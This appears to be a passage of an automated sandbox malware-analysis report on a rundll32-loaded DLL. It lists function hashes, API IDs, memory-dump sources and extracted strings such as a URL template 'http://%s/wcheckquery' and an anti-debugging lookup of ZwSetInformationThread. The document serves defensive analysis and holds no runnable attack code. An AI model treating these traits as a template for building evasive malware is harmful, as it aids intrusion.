                                                                                    • Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
                                                                                    • Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                                    • Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AncestorFromPointRectmemset
                                                                                    • String ID:
                                                                                    • API String ID: 3039914759-0
                                                                                    • Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                    • Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
                                                                                    • Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                    • Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errnoiswspace$memmove
                                                                                    • String ID:
                                                                                    • API String ID: 972559988-0
                                                                                    • Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                    • Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
                                                                                    • Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                    • Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandlewsprintf$CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2803068115-0
                                                                                    • Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                                                                                    • Instruction ID: 5efe1d19d61b494345a211fb9fea68904aed77dec0e5dc2cea542d22390645b5
                                                                                    • Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                                                                                    • Instruction Fuzzy Hash: A841DC72608B8596EB60DF14E4443DEB7B6F7C4344F504025E68943AADEFBDC65ACB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??3@$CriticalSection$Delete$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 274858031-0
                                                                                    • Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                    • Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
                                                                                    • Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                    • Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno
                                                                                    • String ID:
                                                                                    • API String ID: 2918714741-0
                                                                                    • Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                    • Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
                                                                                    • Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                    • Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno
                                                                                    • String ID:
                                                                                    • API String ID: 2918714741-0
                                                                                    • Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                    • Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
                                                                                    • Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                    • Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@$??3@
                                                                                    • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                    • API String ID: 1245774677-2131870787
                                                                                    • Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                    • Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
                                                                                    • Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                    • Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@$??3@
                                                                                    • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                    • API String ID: 1245774677-2131870787
                                                                                    • Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                    • Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
                                                                                    • Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                    • Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileMutexReleaseSystem
                                                                                    • String ID: %I64d$__LastModified__
                                                                                    • API String ID: 4233779698-1650611527
                                                                                    • Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                    • Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
                                                                                    • Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                    • Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHeapOpenProcessQueryValue
                                                                                    • String ID: dfafidjalkfjdalksjfjklfads
                                                                                    • API String ID: 3302636555-1647371548
                                                                                    • Opcode ID: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                    • Instruction ID: 983dc216bf69003e419ddceaeab5995bac8f8453ed4f95b95033b7c069322061
                                                                                    • Opcode Fuzzy Hash: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                    • Instruction Fuzzy Hash: 27515F32701E488AEB55DF65D8807CD33A0F789BD8F448229EA2D47BA5DF38C619C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcessString_vsnwprintf_smemset
                                                                                    • String ID: com$error_code
                                                                                    • API String ID: 3912638396-1490343999
                                                                                    • Opcode ID: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
                                                                                    • Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
                                                                                    • Opcode Fuzzy Hash: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
                                                                                    • Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                    • String ID: http://%s/wcheckquery
                                                                                    • API String ID: 1980634866-481256882
                                                                                    • Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                    • Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
                                                                                    • Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                    • Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastProcSleep
                                                                                    • String ID: InitOnceExecuteOnce
                                                                                    • API String ID: 299661913-4081768745
                                                                                    • Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                    • Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
                                                                                    • Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                    • Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: emc$mpt$nct
                                                                                    • API String ID: 0-4018135154
                                                                                    • Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                    • Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
                                                                                    • Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                    • Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: NTDLL.DLL$ZwSetInformationThread
                                                                                    • API String ID: 1646373207-2735485441
                                                                                    • Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                    • Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
                                                                                    • Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                    • Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: MutexRelease
                                                                                    • String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
                                                                                    • API String ID: 1638419-14785165
                                                                                    • Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                    • Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
                                                                                    • Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                    • Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value_time64
                                                                                    • String ID: MsgCenter$opentime_afterupdate
                                                                                    • API String ID: 785988768-2434204715
                                                                                    • Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                    • Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
                                                                                    • Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                    • Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@_wcslwrmemset
                                                                                    • String ID: Global\QIHOO360_%s
                                                                                    • API String ID: 2483156104-3710684550
                                                                                    • Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                    • Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
                                                                                    • Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                    • Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
